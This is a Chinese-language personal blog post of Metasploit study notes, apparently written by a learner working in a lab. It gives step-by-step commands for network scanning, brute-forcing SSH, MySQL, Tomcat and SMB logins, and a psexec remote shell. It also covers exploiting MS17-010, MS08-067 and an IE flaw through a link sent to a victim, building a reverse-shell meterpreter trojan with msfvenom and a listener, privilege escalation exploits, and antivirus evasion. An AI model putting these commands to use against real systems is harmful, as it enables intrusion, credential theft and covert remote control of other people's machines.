<!DOCTYPE html><html lang="zh-CN "><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hongxiaodou || Metasploit</title>
    <meta name="author" content="hongxiaodou">
    <meta name="description" content="林深不见鹿，山巅自相逢 ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/images/1.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<!-- hexo injector head_end start --><style>
.body hanla:after {
    content: ' ';
    display: inline;
    font-family: Arial;
    font-size: 0.89em;
}

html code hanla,
html pre hanla,
html kbd hanla,
html samp hanla {
    display: none;
}

html ol > hanla,
html ul > hanla {
    display: none;
}
</style><!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"></head>

<body>

    <div id="loading" style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent" style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p><hanla></hanla>加载过慢请开启缓存<hanla></hanla>(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Hongxiaodou</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled">
            </a-icon></span>
            <span><hanla></hanla>主页</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled">
            </a-icon></span>
            <span><hanla></hanla>Hongxiaodou</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled">
                    </a-icon></div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;"><hanla></hanla>主页</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>Metasploit </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled">
            </a-icon></span>
            2021/10/5
        </span>

        
        <span class="category">
            <a href="/categories/工具使用篇">
                <span class="icon">
                    <a-icon type="book" theme="filled">
                </a-icon></span>
                工具使用篇
            </a>
        </span>
        

        
    </div>

    <div class="content" v-pre="">
        <h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p><hanla></hanla>msf   有模块，没有的话可以网上下载<br><hanla></hanla>0708 rdp</p>
<span id="more"></span>

<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9y0Q"><img src="https://s3.jpg.cm/2021/10/05/Ip9y0Q.png" alt="Ip9y0Q.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9ioW"><img src="https://s3.jpg.cm/2021/10/05/Ip9ioW.png" alt="Ip9ioW.png"></a></p>
<p>渗透攻击（exploit）<br>测试者利用系统，程序，或服务的漏洞进行攻击的一个过程。</p>
<p>攻击载荷（payload）<br>攻击者在目标系统上执行的一段攻击代码，该代码具有返弹连接，创建用户，执行其他系统命令的功能</p>
<p>shellcode<br><hanla></hanla>在目标机器上运行的一段机器指令，成功执行后会返回一个<hanla></hanla>shell</p>
<p>模块（module）<br><hanla></hanla>是指<hanla></hanla>Metasploit<hanla></hanla>框架中所使用的一段软件代码组件。</p>
<p>监听器（listener）<br><hanla></hanla>监听器是<hanla></hanla>metasploit<hanla></hanla>中用来等待介入网络连接的组件。</p>
<h2 id="MSF基础知识"><a href="#MSF基础知识" class="headerlink" title="MSF基础知识"></a><hanla></hanla>MSF<hanla></hanla>基础知识</h2><p><hanla></hanla>运行<hanla></hanla>msfconsole 即可打开命令控制接口<br>经常用于提权，<br>后渗透模块很强大  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9aUS"><img src="https://s3.jpg.cm/2021/10/05/Ip9aUS.png" alt="Ip9aUS.png"></a></p>
<p>版本 v6.1.1<br> exploits 漏洞利用模块<br><hanla></hanla>auxilliary 辅助模块，包括信息收集模块，端口扫描模块，暴力破解，嗅探模块等<br><hanla></hanla>post 嗅探键盘，屏幕，进程迁移，获取屏幕等<br><hanla></hanla>payloads  生成木马，反弹链接<br><hanla></hanla>encoders 编码加密，躲避<hanla></hanla>bypass<br>nops 填充代码<br><hanla></hanla>evasion 躲避杀软  </p>
<p>查看每个模块的具体模块：<br>show exploits</p>
<p>之前版本要构建缓存数据库，现在不需要了</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><hanla></hanla>①whois<hanla></hanla>查询：<br>msf &gt; whois example.com<br>msf&gt; whois 192.168.1.100<br>②<a target="_blank" rel="noopener" href="http://searchdns.netcraft.com/%E5%9C%A8%E7%BA%BF%E6%94%B6%E9%9B%86%E6%9C%8D%E5%8A%A1%E5%99%A8"><hanla></hanla>http://searchdns.netcraft.com/<hanla></hanla>在线收集服务器</a><hanla></hanla> IP<hanla></hanla>信息工具<br>③nslookup<br>nmap -sS -A 192.169.8.24  </p>
<p>高级扫描<br><hanla></hanla>msf&gt; use auxiliary/scanner/ip/ipidseq #IPID<hanla></hanla>序列扫描器，与 nmap<hanla></hanla>的-sI   -O<hanla></hanla>选项类似<br><hanla></hanla>showoptions<br>set RHOSTS 192.168.1.0/24<br>set RPORT8080<br>setTHREADS 50<br>run  </p>
<p><hanla></hanla>（ RHOSTS、 RPORT<hanla></hanla>等参数也可以用小写）  </p>
<h3 id="使用portscan模块"><a href="#使用portscan模块" class="headerlink" title="使用portscan模块"></a><hanla></hanla>使用<hanla></hanla>portscan<hanla></hanla>模块</h3><p><hanla></hanla>msf&gt; search postscan<br>msf&gt; use auxiliary/scanner/postscan/syn<br>set<br>RHOSTS 192.168.1.111<br>setTHREADS 50<br>run  </p>
<p>有很多扫描方式，syn tcp<br><hanla></hanla>我们可以直接  use 使用序号或者  use 复制后面路径 例如 use auxiliary/  scanner/portscan/tcp  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9xx2"><img src="https://s3.jpg.cm/2021/10/05/Ip9xx2.png" alt="Ip9xx2.png"></a></p>
<p>show options<br><hanla></hanla>一般我们只需要设置：<br>rhosts:  扫描目标 192.168.8.20/24<br>ports:  扫描端口<br><hanla></hanla>threads: 线程  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9TIh"><img src="https://s3.jpg.cm/2021/10/05/Ip9TIh.png" alt="Ip9TIh.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9M6H"><img src="https://s3.jpg.cm/2021/10/05/Ip9M6H.png" alt="Ip9M6H.png"></a></p>
<p><hanla></hanla>然后直接<hanla></hanla>run<br><hanla></hanla>只扫出一个<hanla></hanla>445</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9OFL"><img src="https://s3.jpg.cm/2021/10/05/Ip9OFL.png" alt="Ip9OFL.png"></a></p>
<h3 id="扫描特定服务"><a href="#扫描特定服务" class="headerlink" title="扫描特定服务"></a>扫描特定服务</h3><pre><code><hanla></hanla>smb_version 模块： 445<hanla></hanla>端口  
msf&gt; use auxiliary/scanner/smb/smb_version  
showoptions  
set   
RHOSTS 192.168.1.111  
run  
db_hosts –c address,os_flavor  
扫描整个段有没有开<hanla></hanla>smb<hanla></hanla>服务
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ip9Zjf"><img src="https://s3.jpg.cm/2021/10/05/Ip9Zjf.png" alt="Ip9Zjf.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTI5U"><img src="https://s3.jpg.cm/2021/10/05/IpTI5U.png" alt="IpTI5U.png"></a></p>
<h3 id="找mssql主机：-1433端口"><a href="#找mssql主机：-1433端口" class="headerlink" title="找mssql主机：  1433端口"></a><hanla></hanla>找<hanla></hanla>mssql<hanla></hanla>主机：  1433<hanla></hanla>端口</h3><p><hanla></hanla>msf&gt; use auxiliary/scanner/mssql/mssql_ping<br>showoptions<br>set<br>RHOSTS 192.168.1.0/24<br>set THREADS 255<br>run  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTLtO"><img src="https://s3.jpg.cm/2021/10/05/IpTLtO.png" alt="IpTLtO.png"></a></p>
<p>加号是成功扫描结果这里一个都没有</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT5De"><img src="https://s3.jpg.cm/2021/10/05/IpT5De.png" alt="IpT5De.png"></a></p>
<h3 id="SSH服务扫描-22端口"><a href="#SSH服务扫描-22端口" class="headerlink" title="SSH服务扫描  22端口"></a><hanla></hanla>SSH<hanla></hanla>服务扫描  22<hanla></hanla>端口</h3><p><hanla></hanla>msf&gt; use auxiliary/scanner/ssh/ssh_version<br>set<br>RHOSTS 192.168.1.0/24<br>setTHREADS 50<br>run </p>
<h3 id="Telnet服务器扫描-23端口"><a href="#Telnet服务器扫描-23端口" class="headerlink" title="Telnet服务器扫描  23端口"></a><hanla></hanla>Telnet<hanla></hanla>服务器扫描  23<hanla></hanla>端口</h3><p><hanla></hanla>msf&gt; use auxiliary/scanner/telnet/telnet_version<br>set RHOSTS 192.168.1.0/24<br>setTHREADS 50<br>run<br>services.msc<br><hanla></hanla>启动<hanla></hanla>telnet<hanla></hanla>服务  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTnok"><img src="https://s3.jpg.cm/2021/10/05/IpTnok.png" alt="IpTnok.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTQ6y"><img src="https://s3.jpg.cm/2021/10/05/IpTQ6y.png" alt="IpTQ6y.png"></a></p>
<h3 id="ftp主机扫描-21端口"><a href="#ftp主机扫描-21端口" class="headerlink" title="ftp主机扫描  21端口"></a><hanla></hanla>ftp<hanla></hanla>主机扫描  21<hanla></hanla>端口</h3><p><hanla></hanla>msf&gt; use auxiliary/scanner/ftp/ftp_version<br>Show options<br>set RHOSTS 192.168.1.0/24<br>setTHREADS 255<br>run  </p>
<h3 id="扫描FTP匿名登录"><a href="#扫描FTP匿名登录" class="headerlink" title="扫描FTP匿名登录"></a><hanla></hanla>扫描<hanla></hanla>FTP<hanla></hanla>匿名登录</h3><p><hanla></hanla>use auxiliary/scanner/ftp/anonymos<br>set RHOSTS 192.168.1.0/24<br>setTHREADS 50<br>run  </p>
<h3 id="扫描局域网中有哪些主机存活"><a href="#扫描局域网中有哪些主机存活" class="headerlink" title="扫描局域网中有哪些主机存活"></a>扫描局域网中有哪些主机存活</h3><p><hanla></hanla>use auxiliary/scanner/discovery/arp_sweep<br>set RHOSTS 192.168.1.0/24<br>setTHREADS 50<br>run  </p>
<h3 id="扫描网站目录-一般还是用别的工具吧"><a href="#扫描网站目录-一般还是用别的工具吧" class="headerlink" title="扫描网站目录  一般还是用别的工具吧"></a>扫描网站目录  一般还是用别的工具吧</h3><p><hanla></hanla>auxiliary/scanner/http/dir_scanner<br>set RHOSTS 192.168.1.1<br>setTHREADS 50<br>run  </p>
<h3 id="搜索网站中的E-mail地址"><a href="#搜索网站中的E-mail地址" class="headerlink" title="搜索网站中的E-mail地址"></a><hanla></hanla>搜索网站中的<hanla></hanla>E-mail<hanla></hanla>地址</h3><p><hanla></hanla>search_email_collector<br>use auxiliary/gather/search_email_collector<br>set DOMAIN cracer.com<br>run  </p>
<p><hanla></hanla>kali<hanla></hanla>里面复制粘贴是<br><hanla></hanla>ctrl+shift+c<br>ctrl+shif+v<br>gather 聚集<br><hanla></hanla>collector 收集家<br><hanla></hanla>domain<hanla></hanla>领域  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTdFr"><img src="https://s3.jpg.cm/2021/10/05/IpTdFr.png" alt="IpTdFr.png"></a></p>
<h3 id="嗅探抓包"><a href="#嗅探抓包" class="headerlink" title="嗅探抓包"></a>嗅探抓包</h3><p><hanla></hanla>msf&gt; use auxiliary/sniffer/psnuffle<br>run<br><hanla></hanla>没有加密的流量很有可能被抓到  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTey5"><img src="https://s3.jpg.cm/2021/10/05/IpTey5.png" alt="IpTey5.png"></a></p>
<h3 id="MSF-密码破解模块"><a href="#MSF-密码破解模块" class="headerlink" title="MSF 密码破解模块"></a>MSF 密码破解模块</h3><p>服务工具方法：<br><hanla></hanla>1.<hanla></hanla>漏洞利用<br><hanla></hanla>2.<hanla></hanla>账号爆破<br><hanla></hanla>3.<hanla></hanla>服务欺骗<br><hanla></hanla>4.<hanla></hanla>服务钓鱼攻击   </p>
<p><hanla></hanla>常见<hanla></hanla>ftp<hanla></hanla>服务<br><hanla></hanla>servier u<br>filezilla<br>g6ftp<br>flashfxp  </p>
<p><hanla></hanla>cs<hanla></hanla>是<hanla></hanla>payload 和<hanla></hanla>listenr<br><hanla></hanla>还有漏洞提权  </p>
<p><hanla></hanla>报<hanla></hanla>wifi<hanla></hanla>字典大很有可能爆出来<br><hanla></hanla>hashcat 破解  </p>
<h3 id="ssh服务口令猜测"><a href="#ssh服务口令猜测" class="headerlink" title="ssh服务口令猜测"></a><hanla></hanla>ssh<hanla></hanla>服务口令猜测</h3><p><hanla></hanla>use auxiliary/scanner/ssh/ssh_login<br>set RHOSTS 192.168.80.134<br>set USERNAME root<br>set PASS_FILE /root/pass.txt<br>set THREADS 50<br>run  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT65C"><img src="https://s3.jpg.cm/2021/10/05/IpT65C.png" alt="IpT65C.png"></a></p>
<p>sessions -l 查看会话列表<br><hanla></hanla>session -i 1  调取会话列表  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTVNt"><img src="https://s3.jpg.cm/2021/10/05/IpTVNt.png" alt="IpTVNt.png"></a></p>
<p> command 命令</p>
<h3 id="mysql口令攻击"><a href="#mysql口令攻击" class="headerlink" title="mysql口令攻击"></a><hanla></hanla>mysql<hanla></hanla>口令攻击</h3><p><hanla></hanla>search mysql<br>use auxiliary/scanner/mysql/mysql_login<br>show options<br>set RHOSTS 192.168.80.130<br>set user_file /root/user.txt<br>set pass_file /root/pass.txt<br>exploit<br><hanla></hanla>外部<hanla></hanla>ip 爆破 root<br><hanla></hanla>不行，只能<hanla></hanla>127.0.0.1  </p>
<h3 id="postgresql攻击"><a href="#postgresql攻击" class="headerlink" title="postgresql攻击"></a><hanla></hanla>postgresql<hanla></hanla>攻击</h3><p><hanla></hanla>search  postgresql<br>use auxiliary/scanner/postgres/postgres_login<br>show options<br>set RHOSTS 192.168.80.130<br>set user_file /root/user.txt<br>set pass_fiel /root/pass.txt<br>exploit  </p>
<h3 id="tomcat-攻击"><a href="#tomcat-攻击" class="headerlink" title="tomcat 攻击"></a>tomcat 攻击</h3><p><hanla></hanla>search tomcat<br>use auxiliary/scanner/http/tomcat_mgr_login<br>set RHOSTS 192.168.1.1<br>set PASS_FILE /root/pass.txt<br>set USER_FILE /root/user.txt<br>exploit<br><hanla></hanla>密码破解里面有个专门爆<hanla></hanla>tomcat<hanla></hanla>的工具<br><hanla></hanla>unset 取消设置</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT82R"><img src="https://s3.jpg.cm/2021/10/05/IpT82R.png" alt="IpT82R.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTXLz"><img src="https://s3.jpg.cm/2021/10/05/IpTXLz.png" alt="IpTXLz.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTcbu"><img src="https://s3.jpg.cm/2021/10/05/IpTcbu.png" alt="IpTcbu.png"></a></p>
<p><hanla></hanla>能登录进去的化就可以去上传一个<hanla></hanla>jsp<hanla></hanla>的码就可以<hanla></hanla>getshell<hanla></hanla>了</p>
<h3 id="telnet-攻击"><a href="#telnet-攻击" class="headerlink" title="telnet 攻击"></a>telnet 攻击</h3><p><hanla></hanla>use auxiliary/scanner/telnet/telnet_login<br>set 192.168.1.1<br>exploit<br><hanla></hanla>爆<hanla></hanla>telnet<hanla></hanla>很慢<br><hanla></hanla>如果他开着别的端口可以爆别的端口比如<hanla></hanla>smb  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTSNT"><img src="https://s3.jpg.cm/2021/10/05/IpTSNT.png" alt="IpTSNT.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTY2E"><img src="https://s3.jpg.cm/2021/10/05/IpTY2E.png" alt="IpTY2E.png"></a></p>
<h3 id="samba攻击"><a href="#samba攻击" class="headerlink" title="samba攻击"></a><hanla></hanla>samba<hanla></hanla>攻击</h3><p><hanla></hanla>use auxiliary/scanner/smb/smb_login<br>set RHOSTS 192.168.1.1 /192.168.1.0/24<br>set THREADS 200<br>exploit<br><hanla></hanla>假如你爆出管理员账号和密码了<br>服务器又没开<br><hanla></hanla>telnet   rdp 服务怎么去连接他呢</p>
<p>445 顶多只能 net  use K: \\192.168.8.128\\c$  </p>
<p>psexec.exe  \\192.168.8.128 -l administrator -p 123123 cmd.exe<br><hanla></hanla>这样就会直接打开一个远程会话直接操控<hanla></hanla>cmd  </p>
<h2 id="MSF漏洞利用模块"><a href="#MSF漏洞利用模块" class="headerlink" title="MSF漏洞利用模块"></a><hanla></hanla>MSF<hanla></hanla>漏洞利用模块</h2><p>远程代码执行漏洞<br>浏览器漏洞<br>服务漏洞<br>本地提权漏洞  </p>
<p>探测存活主机<br><hanla></hanla>search arp_<br>use 0<br>show options  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTN76"><img src="https://s3.jpg.cm/2021/10/05/IpTN76.png" alt="IpTN76.png"></a></p>
<p>set rhosts 192.168.8.0/24<br>setg threads 50<br>run  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTHFD"><img src="https://s3.jpg.cm/2021/10/05/IpTHFD.png" alt="IpTHFD.png"></a></p>
<p><hanla></hanla>查看开了<hanla></hanla>445<hanla></hanla>端口的<br><hanla></hanla>search smb_version</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTJyp"><img src="https://s3.jpg.cm/2021/10/05/IpTJyp.png" alt="IpTJyp.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTsPQ"><img src="https://s3.jpg.cm/2021/10/05/IpTsPQ.png" alt="IpTsPQ.png"></a></p>
<p>nmap –script smb-vuln* 192.168.8.67</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTEbh"><img src="https://s3.jpg.cm/2021/10/05/IpTEbh.png" alt="IpTEbh.png"></a></p>
<p>秒他！！！</p>
<p>search ms17-010</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTF4S"><img src="https://s3.jpg.cm/2021/10/05/IpTF4S.png" alt="IpTF4S.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTkMW"><img src="https://s3.jpg.cm/2021/10/05/IpTkMW.png" alt="IpTkMW.png"></a></p>
<p>run</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTpV2"><img src="https://s3.jpg.cm/2021/10/05/IpTpV2.png" alt="IpTpV2.png"></a></p>
<p><hanla></hanla>连接<hanla></hanla>3389    rdesktop 192.168.8.125<br><hanla></hanla>可以直接连接<hanla></hanla>3389  </p>
<p><hanla></hanla>试一下<hanla></hanla>xp<hanla></hanla>的漏洞  </p>
<p>探测主机存活：  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTBSU"><img src="https://s3.jpg.cm/2021/10/05/IpTBSU.png" alt="IpTBSU.png"></a></p>
<p><hanla></hanla>用<hanla></hanla>nmap 自带漏洞脚本进行探测<br><hanla></hanla>nmap –script smb-vuln* 192.168.8.55  </p>
<p>扫出两个漏洞  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT47f"><img src="https://s3.jpg.cm/2021/10/05/IpT47f.png" alt="IpT47f.png"></a></p>
<p><hanla></hanla>用<hanla></hanla>msf<hanla></hanla>利用一下啊<hanla></hanla>ms08-067</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTw9L"><img src="https://s3.jpg.cm/2021/10/05/IpTw9L.png" alt="IpTw9L.png"></a></p>
<p>以前版本要设置<br><hanla></hanla>module 的 rhosts<br><hanla></hanla>然后添加<hanla></hanla>payload<br>set payload windows/meterpreter/reverse_tcp<br><hanla></hanla>会多出来攻击载荷,<hanla></hanla>但是新版直接有<br><hanla></hanla>直接<hanla></hanla>run 跑起来  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTf2O"><img src="https://s3.jpg.cm/2021/10/05/IpTf2O.png" alt="IpTf2O.png"></a></p>
<p>这里显示攻击完成但是没有建立会话</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTvkH"><img src="https://s3.jpg.cm/2021/10/05/IpTvkH.png" alt="IpTvkH.png"></a></p>
<p><hanla></hanla>查找原因试没有设置<hanla></hanla>target<br>show targets<br>set target 34  </p>
<p>哈哈哈还是不行<br><hanla></hanla>emmm…….  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTzPw"><img src="https://s3.jpg.cm/2021/10/05/IpTzPw.png" alt="IpTzPw.png"></a></p>
<p>假设我们成功了<br><hanla></hanla>ps  查看进程</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT3Mk"><img src="https://s3.jpg.cm/2021/10/05/IpT3Mk.png" alt="IpT3Mk.png"></a></p>
<p>migrate 672<br><hanla></hanla>迁移进程</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT0u8"><img src="https://s3.jpg.cm/2021/10/05/IpT0u8.png" alt="IpT0u8.png"></a></p>
<p>run vnc 可以看管理员桌面监控你<br><hanla></hanla>shell<hanla></hanla>调用你的<hanla></hanla>cmd<br>background 挂起<br>需要用的时候在<br><hanla></hanla>sessions -l<br>sessions -i 3  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT24i"><img src="https://s3.jpg.cm/2021/10/05/IpT24i.png" alt="IpT24i.png"></a></p>
<h3 id="漏洞利用常用命令"><a href="#漏洞利用常用命令" class="headerlink" title="漏洞利用常用命令"></a>漏洞利用常用命令</h3><pre><code><hanla></hanla>search <name> 
用指定关键字搜索可利用漏洞
use <exploit name="">
 使用漏洞
show options 
显示选项
set <option name=""> </option><option>
 设置选项
show payloads 显示装置

show targets 显示目标<hanla></hanla>(os<hanla></hanla>版本)
set TARGET <target number=""> 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
sessions -i <id> 选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放到后台
<ctrl> c 结束会话

show auxiliary 显示辅助模块
use <auxiliary name=""> 使用辅助模块
set <option name=""> </option><option> 设置选项
run 运行模块

MS10_002
MS10_018
MS12-020
MS10-046
MS08_067
MS12-004
Ms17-010
Linux samba<hanla></hanla>漏洞利用
</option></auxiliary></ctrl></ctrl></id></id></target></option></exploit></name></code></pre>
<h3 id="ms10-002-ie漏洞利用入侵实战"><a href="#ms10-002-ie漏洞利用入侵实战" class="headerlink" title="ms10-002 ie漏洞利用入侵实战"></a><hanla></hanla>ms10-002 ie<hanla></hanla>漏洞利用入侵实战</h3><pre><code><hanla></hanla>use windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
show options
set SRVPORT 80
set URIPATH /
set LHOST 192.168.2.128
set LPORT 444
exploit 
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTK8e"><img src="https://s3.jpg.cm/2021/10/05/IpTK8e.png" alt="IpTK8e.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTa3t"><img src="https://s3.jpg.cm/2021/10/05/IpTa3t.png" alt="IpTa3t.png"></a></p>
<p>把这个地址发送给中招小可爱，如果对方点了这个链接就中招了</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTj9r"><img src="https://s3.jpg.cm/2021/10/05/IpTj9r.png" alt="IpTj9r.png"></a></p>
<p>但是现实要公网，<br><hanla></hanla>可以自己买个服务器装一个<hanla></hanla>debian,<br><hanla></hanla>ngrok<hanla></hanla>也可以后面在拓展<br><hanla></hanla>又没有成功<hanla></hanla>emmm  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTxRR"><img src="https://s3.jpg.cm/2021/10/05/IpTxRR.png" alt="IpTxRR.png"></a></p>
<h3 id="MS12-020漏洞"><a href="#MS12-020漏洞" class="headerlink" title="MS12-020漏洞"></a><hanla></hanla>MS12-020<hanla></hanla>漏洞</h3><p>蓝屏漏洞<br><hanla></hanla>试了几个都不行<hanla></hanla>emmm</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTTSC"><img src="https://s3.jpg.cm/2021/10/05/IpTTSC.png" alt="IpTTSC.png"></a></p>
<p> 很多漏洞都是配合着用，你能想到的漏洞都是在左右着你的思维</p>
<p>cve_2019_0708  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpT9Q5"><img src="https://s3.jpg.cm/2021/10/05/IpT9Q5.png" alt="IpT9Q5.png"></a></p>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p><hanla></hanla>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.124 lport=1122 -f exe &gt;1.exe<br><hanla></hanla>先做一个木马放到<hanla></hanla>windows7<hanla></hanla>里面</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTDuz"><img src="https://s3.jpg.cm/2021/10/05/IpTDuz.png" alt="IpTDuz.png"></a></p>
<p>做一个监听的会话<br><hanla></hanla>use exploit/multi/handler<br>set payload windows/meterpreter/reverse_tcp<br>show options<br>set lhost 192.168.8.124<br>set lport 1122<br>run  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTMBu"><img src="https://s3.jpg.cm/2021/10/05/IpTMBu.png" alt="IpTMBu.png"></a></p>
<p>windows 7 双击运行建立了会话</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpTOOG"><img src="https://s3.jpg.cm/2021/10/05/IpTOOG.png" alt="IpTOOG.png"></a></p>
<p><hanla></hanla>getuid<hanla></hanla>查看当前权限只是该管理员<br><hanla></hanla>use  incognito<br><hanla></hanla>劫持一下<hanla></hanla>session 看有没有可用会话<br><hanla></hanla>list_tokens -u<br><hanla></hanla>没有高权限会话  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaG84"><img src="https://s3.jpg.cm/2021/10/05/IpaG84.png" alt="IpaG84.png"></a></p>
<p>先挂起，background  </p>
<p>search suggester<br><hanla></hanla>这个可以检测系统有哪些补丁没打  </p>
<h3 id="search-ms16-032"><a href="#search-ms16-032" class="headerlink" title="search ms16-032"></a>search ms16-032</h3><p><hanla></hanla>经常提权的漏洞</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaImX"><img src="https://s3.jpg.cm/2021/10/05/IpaImX.png" alt="IpaImX.png"></a></p>
<p>set session 2<br>show targets<br>use 1<br>run  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa71Q"><img src="https://s3.jpg.cm/2021/10/05/Ipa71Q.png" alt="Ipa71Q.png"></a></p>
<p>试试</p>
<h3 id="search-ms15-051"><a href="#search-ms15-051" class="headerlink" title="search ms15-051"></a>search ms15-051</h3><p> set session 2<br>run</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpadOS"><img src="https://s3.jpg.cm/2021/10/05/IpadOS.png" alt="IpadOS.png"></a></p>
<p><hanla></hanla>win7   08<hanla></hanla>这个用的比较多</p>
<h3 id="search-8120"><a href="#search-8120" class="headerlink" title="search 8120"></a>search 8120</h3><p><hanla></hanla>提取成功</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaQBh"><img src="https://s3.jpg.cm/2021/10/05/IpaQBh.png" alt="IpaQBh.png"></a></p>
<p><hanla></hanla>gituid 已经是<hanla></hanla>system<hanla></hanla>权限了  </p>
<p>实战环境很复杂<br>要.net  环境  ms16-075(烂土豆编号)<br>waf  杀软<br><hanla></hanla>bypass  av<br><hanla></hanla>免杀绕过                                                                                                                             </p>
<p><hanla></hanla>powershell<hanla></hanla>脚本   empire ps1<hanla></hanla>可以过一些杀软  </p>
